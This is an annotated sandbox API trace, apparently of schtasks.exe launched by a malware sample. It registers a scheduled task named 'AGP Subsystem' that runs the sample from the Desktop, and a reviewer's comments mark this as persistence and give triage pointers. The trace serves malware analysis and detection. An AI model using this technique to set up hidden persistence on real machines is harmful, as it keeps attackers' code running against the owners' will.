[0169.625] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] lstrlenW (lpString="xml") returned 3
[0169.625] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.625] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|k|") returned 3
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|k|") returned 3
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.626] SetLastError (dwErrCode=0x490)
[0169.626] lstrlenW (lpString="du") returned 2
[0169.626] lstrlenW (lpString="du") returned 2
[0169.626] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] lstrlenW (lpString="xml") returned 3
[0169.626] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|du|") returned 4
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|du|") returned 4
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.626] SetLastError (dwErrCode=0x490)
[0169.626] lstrlenW (lpString="ri") returned 2
[0169.626] lstrlenW (lpString="ri") returned 2
[0169.626] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] lstrlenW (lpString="xml") returned 3
[0169.626] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.626] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|ri|") returned 4
[0169.626] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.626] lstrlenW (lpString="|ri|") returned 4
[0169.626] lstrlenW (lpString="|xml|") returned 5
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="z") returned 1
[0169.627] lstrlenW (lpString="z") returned 1
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] lstrlenW (lpString="xml") returned 3
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|z|") returned 3
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.627] lstrlenW (lpString="|z|") returned 3
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="f") returned 1
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|f|") returned 3
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.627] SetLastError (dwErrCode=0x490)
[0169.627] lstrlenW (lpString="v1") returned 2
[0169.627] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.627] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|v1|") returned 4
[0169.627] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] lstrlenW (lpString="xml") returned 3
[0169.628] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28cd18 | out: _Buffer="|xml|") returned 5
[0169.628] StrStrIW (lpFirst="|xml|", lpSrch="|xml|") returned="|xml|"
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] lstrlenW (lpString="-/") returned 2
[0169.628] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] SetLastError (dwErrCode=0x490)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp"
[0169.628] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.628] _memicmp (_Buf1=0x304ce0, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] _memicmp (_Buf1=0x304d10, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.628] SetLastError (dwErrCode=0x7a)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] SetLastError (dwErrCode=0x0)
[0169.628] lstrlenW (lpString="C") returned 1
[0169.629] SetLastError (dwErrCode=0x490)
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] GetProcessHeap () returned 0x2f0000
[0169.629] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x64) returned 0x306a20
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.629] SetLastError (dwErrCode=0x0)
[0169.629] GetProcessHeap () returned 0x2f0000
[0169.629] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x1fc) returned 0x306a90
# Task Scheduler COM setup. CoInitializeEx and CoInitializeSecurity both return 0x0, then
# CoCreateInstance is called with CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} (TaskScheduler)
# and IID {2FABA4C7-4DA9-4013-9697-20CC3FD40F85} (ITaskService); the returned object is 0x5a3dd0.
[0169.629] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0169.644] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0169.671] CoCreateInstance (in: rclsid=0x2c230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x2c20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x28d148 | out: ppv=0x28d148*=0x5a3dd0) returned 0x0
# Connect: user, domain and password are passed with varType=0x0 (VT_EMPTY), so no explicit
# credentials are supplied in this call. serverName has varType=0x8 (VT_BSTR); its string value
# is not shown in this record.
[0169.684] TaskScheduler:ITaskService:Connect (This=0x5a3dd0, serverName=0x28d0b8*(varType=0x8, wReserved1=0x0, wReserved2=0xd12c, wReserved3=0x28, varVal1=0x0, varVal2=0x28da00), user=0x28d0c8*(varType=0x0, wReserved1=0x28, wReserved2=0xd150, wReserved3=0x28, varVal1=0x75419cde, varVal2=0x28da00), domain=0x28d0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x1f4, wReserved3=0x0, varVal1=0x6, varVal2=0x0), password=0x28d0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x9c39, wReserved3=0x7541, varVal1=0x74, varVal2=0x28db80)) returned 0x0
[0169.691] TaskScheduler:IUnknown:AddRef (This=0x5a3dd0) returned 0x2
# GetFolder returns folder object 0x5a3e38; the same pointer is the This argument of the
# ITaskFolder:RegisterTask call later in the trace. Path is logged as 0x0 here.
[0169.691] TaskScheduler:ITaskService:GetFolder (in: This=0x5a3dd0, Path=0x0, ppFolder=0x28d1ec | out: ppFolder=0x28d1ec*=0x5a3e38) returned 0x0
# The file named on the command line (tmpFD29.tmp in the user's Temp directory) is opened for
# reading only (dwDesiredAccess=0x80000000, dwCreationDisposition=0x3 = OPEN_EXISTING).
# GetFileSizeEx reports 1358 bytes.
[0169.693] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpfd29.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x110
[0169.693] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x28cadc | out: lpFileSize=0x28cadc*=1358) returned 1
# A 2-byte read followed by a seek back to offset 0 - presumably an encoding/BOM probe before
# the full read (not confirmed by this record).
[0169.693] ReadFile (in: hFile=0x110, lpBuffer=0x28cae4, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x28caec, lpOverlapped=0x0 | out: lpBuffer=0x28cae4*, lpNumberOfBytesRead=0x28caec*=0x2, lpOverlapped=0x0) returned 1
[0169.693] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
# Whole file is read into a 0x54f-byte buffer (0x54e = 1358 bytes actually read).
[0169.693] malloc (_Size=0x54f) returned 0x5a24e8
[0169.693] ReadFile (in: hFile=0x110, lpBuffer=0x5a24e8, nNumberOfBytesToRead=0x54f, lpNumberOfBytesRead=0x28caec, lpOverlapped=0x0 | out: lpBuffer=0x5a24e8*, lpNumberOfBytesRead=0x28caec*=0x54e, lpOverlapped=0x0) returned 1
# The buffer is converted to wide characters (1359 including the terminator). NOTE(review): the
# string shown below is much shorter than 1358 characters and contains only text values
# (InteractiveToken, HighestAvailable, Parallel, PT0S, 4, the quoted sample path, $(Arg0)); the
# XML element markup appears to have been stripped from this capture. Use the dropped
# tmpFD29.tmp itself for the complete task definition. The values that survive suggest a task
# whose action is the analysed sample on the Desktop, with HighestAvailable presumably being
# the run level - confirm against the file.
[0169.693] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x5a24e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1359
[0169.694] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x5a24e8, cbMultiByte=-1, lpWideCharStr=0x314fd4, cchWideChar=1359 | out: lpWideCharStr="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 1359
[0169.694] SysStringLen (param_1="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n") returned 0x54e
[0169.694] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n", pbstrResult=0x28ca8c | out: pbstrResult=0x28ca8c) returned 0x0
[0169.695] free (_Block=0x5a24e8)
[0169.695] CloseHandle (hObject=0x110) returned 1
[0169.695] lstrlenW (lpString="") returned 0
[0169.695] malloc (_Size=0xc) returned 0x5a3ea0
[0169.695] SysStringLen (param_1="") returned 0x0
[0169.695] free (_Block=0x5a3ea0)
[0169.695] lstrlenW (lpString="") returned 0
# Persistence point: the task definition read from tmpFD29.tmp is registered under the name
# "AGP Subsystem" on folder object 0x5a3e38. flags=6 corresponds to TASK_CREATE_OR_UPDATE and
# LogonType=0 to TASK_LOGON_NONE; UserId is an empty BSTR and password/sddl are VT_EMPTY
# (varType=0x0). The call returns 0x0 (S_OK), i.e. the task was created.
# Triage: look for a scheduled task with this name whose action is the quoted sample path, and
# for the matching task-registration event in the Task Scheduler operational log.
[0169.696] ITaskFolder:RegisterTask (in: This=0x5a3e38, Path="AGP Subsystem", XmlText="\r\n\r\n \r\n \r\n \r\n \r\n InteractiveToken\r\n HighestAvailable\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 4\r\n \r\n \r\n \r\n \"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\"\r\n $(Arg0)\r\n \r\n \r\n", flags=6, UserId=0x28cac8*(varType=0x8, wReserved1=0x0, wReserved2=0x4178, wReserved3=0x31, varVal1="", varVal2=0x314178), password=0x28cad8*(varType=0x0, wReserved1=0x31, wReserved2=0x0, wReserved3=0x0, varVal1=0x28cb60, varVal2=0x76987526), LogonType=0, sddl=0x28caec*(varType=0x0, wReserved1=0x31, wReserved2=0x4178, wReserved3=0x31, varVal1=0x0, varVal2=0x0), ppTask=0x28cb4c | out: ppTask=0x28cb4c*=0x5a3ec8) returned 0x0
[0169.829] GetProcessHeap () returned 0x2f0000
[0169.829] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305738
[0169.830] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
# The success message is loaded from the module's string table (uID=0x12e) and formatted with
# the task name. NOTE(review): this wording matches the output of schtasks.exe, so this part
# of the trace is presumably the schtasks child process - confirm against the Process header
# that precedes this section of the log.
[0169.830] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0169.830] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0169.830] GetProcessHeap () returned 0x2f0000
[0169.830] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x82) returned 0x314d20
[0169.830] _vsnwprintf (in: _Buffer=0x28cb58, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x28cafc | out: _Buffer="SUCCESS: The scheduled task \"AGP Subsystem\" has successfully been created.\n") returned 75
[0169.830] _fileno (_File=0x754b2920) returned 1
[0169.830] _errno () returned 0x5a07d8
[0169.830] _get_osfhandle (_FileHandle=1) returned 0x7
[0169.830] _errno () returned 0x5a07d8
[0169.830] GetFileType (hFile=0x7) returned 0x2
[0169.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0169.830] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28cac0 | out: lpMode=0x28cac0) returned 1
[0169.831] __iob_func () returned 0x754b2900
[0169.831] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0169.831] lstrlenW (lpString="SUCCESS: The scheduled task \"AGP Subsystem\" has successfully been created.\n") returned 75
# The formatted message (0x4b = 75 characters) is written to the console on standard output.
[0169.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x28cb58*, nNumberOfCharsToWrite=0x4b, lpNumberOfCharsWritten=0x28cae8, lpReserved=0x0 | out: lpBuffer=0x28cb58*, lpNumberOfCharsWritten=0x28cae8*=0x4b) returned 1
# COM objects are released: the registered-task object (0x5a3ec8), the folder (0x5a3e38) and
# the task service (0x5a3dd0, one reference still outstanding after this call).
[0169.832] IUnknown:Release (This=0x5a3ec8) returned 0x0
[0169.832] TaskScheduler:IUnknown:Release (This=0x5a3e38) returned 0x0
[0169.832] TaskScheduler:IUnknown:Release (This=0x5a3dd0) returned 0x1
[0169.832] lstrlenW (lpString="") returned 0
[0169.832] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.832] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a90) returned 1
[0169.832] GetProcessHeap () returned 0x2f0000
[0169.832] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306a90) returned 0x1fc
[0169.833] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a90 | out: hHeap=0x2f0000) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a20) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306a20) returned 0x64
[0169.833] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306a20 | out: hHeap=0x2f0000) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.833] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398) returned 1
[0169.833] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305398) returned 0x16
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2ff058) returned 0x10
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3053b8) returned 0x14
[0169.834] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8 | out: hHeap=0x2f0000) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306670) returned 1
[0169.834] GetProcessHeap () returned 0x2f0000
[0169.834] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306670) returned 0xa0
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306670 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c68) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c68) returned 0x10
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c68 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305278) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305278) returned 0x14
[0169.835] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305278 | out: hHeap=0x2f0000) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306978) returned 1
[0169.835] GetProcessHeap () returned 0x2f0000
[0169.835] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306978) returned 0x68
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306978 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304d10) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304d10) returned 0x10
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304d10 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305238) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305238) returned 0x14
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305238 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cf8) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cf8) returned 0xc
[0169.836] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cf8 | out: hHeap=0x2f0000) returned 1
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.836] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ce0) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304ce0) returned 0x10
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ce0 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305218) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305218) returned 0x14
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305218 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305a80) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305a80) returned 0x208
[0169.837] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305a80 | out: hHeap=0x2f0000) returned 1
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.837] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c08) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c08) returned 0x10
[0169.838] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c08 | out: hHeap=0x2f0000) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051d8) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3051d8) returned 0x14
[0169.838] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051d8 | out: hHeap=0x2f0000) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306718) returned 1
[0169.838] GetProcessHeap () returned 0x2f0000
[0169.838] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306718) returned 0x200
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306718 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c80) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c80) returned 0x10
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c80 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305178) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305178) returned 0x14
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305178 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052f8) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052f8) returned 0x14
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052f8 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
